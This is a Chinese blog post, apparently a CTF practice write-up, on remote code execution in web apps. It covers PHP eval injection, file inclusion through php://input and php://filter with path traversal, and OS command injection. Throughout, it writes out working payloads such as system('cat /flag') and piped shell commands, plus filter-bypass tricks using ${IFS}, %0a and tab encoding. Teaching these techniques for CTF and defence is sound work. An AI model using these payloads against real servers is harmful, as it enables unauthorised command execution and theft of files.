当前位置：首页 > news >正文

web基础之RCE

news 文章来源：https://blog.csdn.net/m0_74080781/article/details/142179684 2025/5/2 3:08:05

简介：RCE称为远程代码执行漏洞；是互联网的一种安全漏洞；攻击者可以直接向后台服务器远程注入操作系统命令；从而操控后台系统；也是CTF比较常考的一个方面

1、eval执行

（1）分析后端代码：
if (isset($_REQUEST['cmd']))检查是否从存在cmd参数；eval($_REQUEST["cmd"])如果cmd参数存在的话，则eval()函数会将用户传递进来的参数当作php代码执行！

(2)查看网站当前目录

/?cmd=system(“ls”);

页面回显出来了index.php信息；并没有有用的文件；我们看一下上一级目录有啥文件吧；输入

/?cmd=system(“ls /”);

好像找到了有关flag的信息

查看文件的信息

?cmd=system("cat /flag_26015");

拿到flag

2、文件包含

文件包含
(1)分析后端代码
根据后端代码；首先输入?file=shell.txt;发现出现了eval函数；和上面不同的是通过post提交数据的；需要用hackbar插件或者通过bp抓包重发修改信息
（2）查看当前的目录文件（发现了index.php;shell.txt）

查看上一级目录的信息（看到etc flag文件）

ctfhub=system("ls /")

查看flag；输入

ctfhub=system("cat /flag");

php://input伪协议
(1)php://input
php://input用于执行php代码；条件是allow_url_include是On；查看phpinfo文件；查看发现满足条件，直接利用！
(2)使用bp抓包；发送到重发器模块当中；修改为post请求方式；增加<?php system('ls /');?>点击send看到上一级目录有flag信息

修改为<?php system("cat /flag_27289");?>拿到flag

远程包含
(1)发现有phpinfo文件；进去看看；可以进行远程包含（allow_url_include=ON);可以使用php://input执行php函数

（2）利用hackbar插件(这里用不了；因为提交数据的方式是GET；只能用bp抓包重放修改信息）
过程：url+?file=php://input；点击抓包；发送到repeater模块；然后修改GET为post；增加<?php system("ls /");?>;点击send；获得上一级目录信息；看到flag信息

修改playload：<?php system("cat /flag");?>;拿下flag

读取源代码
（1）这是尝试了一下php://input;发现漏洞点不在这；那可能就是php://filter；php://filter用于读取源码

（2）
题目提示：flag在 /flag当中；所以直接构造?file=php://filter/resource=../../../flag

http://URL/?file=php://filter/resource=../../../flag

3、命令注入

先导知识：

命令注入无过滤
(1)明确题目意思；查看当前目录下的文件

127.0.0.1|ls

使用cat 命令查看207971175014811.php文件；发现打不开；f12直接查看源码直接拿到flag;大佬的另一种方法就是使用base64解密

127.0.0.1|cat 14430616024597.php|base64

base64解密拿到flag

过滤cat
（1)cat命令被过滤了，在linux当中查看文件内容的命令有很多；比如 more head tail less；
eg:
cat 由第一行开始显示内容，并将所有内容输出 tac 从最后一行倒序显示内容，并将所有内容输出 more 根据窗口大小，一页一页的现实文件内容 less 和more类似，但其优点可以往前翻页，而且进行可以搜索字符 head 只显示头几行 tail 只显示最后几行
输入:
127.0.0.1& more flag_90501846017901.php|base64

解密拿到flag

过滤空格
分析后端代码发现对空格进行了过滤;使用<;ifs ${IFS} %0d 等等代替空格（参考web渗透—RCE）
127.0.0.1&cat<flag_20135747217897.php|base64
过滤目录分隔符

输入127.0.0.1;ls,发现了flag_is_here目录；然后进入这个目录；查看这个目录包含的文件；输入127.0.0.1;cd flag_is_here;ls；发现了flag_4635141399483.php;输入：127.0.0.1;cd flag_is_here;cat flag_4635141399483.php|base64,拿到flag；或者直接f12

过滤运算符
发现用不了运算符号了；那就使用;；然后输入127.0.0.1；cat flag_29492699725561.php直接f12查看源码;或者输入
127.0.0.1 ; base64 flag_29492699725561.php直接得到flag

综合过滤练习
自行寻找替换；很简单！为减少篇幅，此处不做过多赘述！
(1)查看服务器下的文件
&& <==> || <==> %0a <==> %0d
?ip=127.0.0.1%0als

空格<==>%09(tab)<==>${IFS}<==>$IFS<==>$IFS$9<==><
（2）查看存在flag文件目录下的文件

?ip=127.0.0.1%0acd${IFS}f***_is_here${IFS}%0als

（3）查看flag文件的内容

?ip=127.0.0.1%0acd${IFS}f***_is_here${IFS}%0a${IFS}more${IFS}f***_236832160630622.php

web基础之RCE

1、eval执行

2、文件包含

3、命令注入

相关文章：

web基础之RCE

c语言--水仙花数，求Sn的前五项和

SpringBoot教程（二十八） | SpringBoot集成Elasticsearch（Java High Level Rest Client方式）

【Vue3】常用的响应式数据类型

搭建本地DVWA靶场教程及靶场使用示例

60. n 个骰子的点数【难】

高性能编程：无锁队列

word标题排序编号错误

力扣---80. 删除有序数组中的重复项 II

一篇文章，讲清SQL的 joins 语法

设计模式之建造者模式(通俗易懂--代码辅助理解【Java版】）

文生视频算法

LoRA: Low-Rank Adaptation Abstract

正点原子阿尔法ARM开发板-IMX6ULL（二）——介绍情况以及汇编

Unreal Engine——AI生成高精度的虚拟人物和环境（虚拟世界构建、电影场景生成）（一）

Emlog程序屏蔽用户IP拉黑名单插件

发送成绩的app或小程序推荐

51单片机-AT24C02(IIC总线介绍及其时序编写步骤)-第一节（下一节实战）

＜＜编码＞＞第 11 章逻辑门电路--或非门, 与非门, 缓冲器示例电路

股票api接口程序化报备，程序化交易监管对个人量化交易者有何影响

如何自己搭建一个网站？

虚拟化数据恢复—断电导致虚拟机目录项被破坏的数据恢复案例

[机器学习]聚类算法

JVM面试真题总结（七）

深入理解CASAtomic原子操作类详解

C51单片机-单按键输入识别，键盘消抖

基于CNN卷积神经网络迁移学习的图像识别实现

【iOS】push和present的区别

在Linux服务器上添加用户并设置自动登录

网站被爬，数据泄露，如何应对不断强化的安全危机？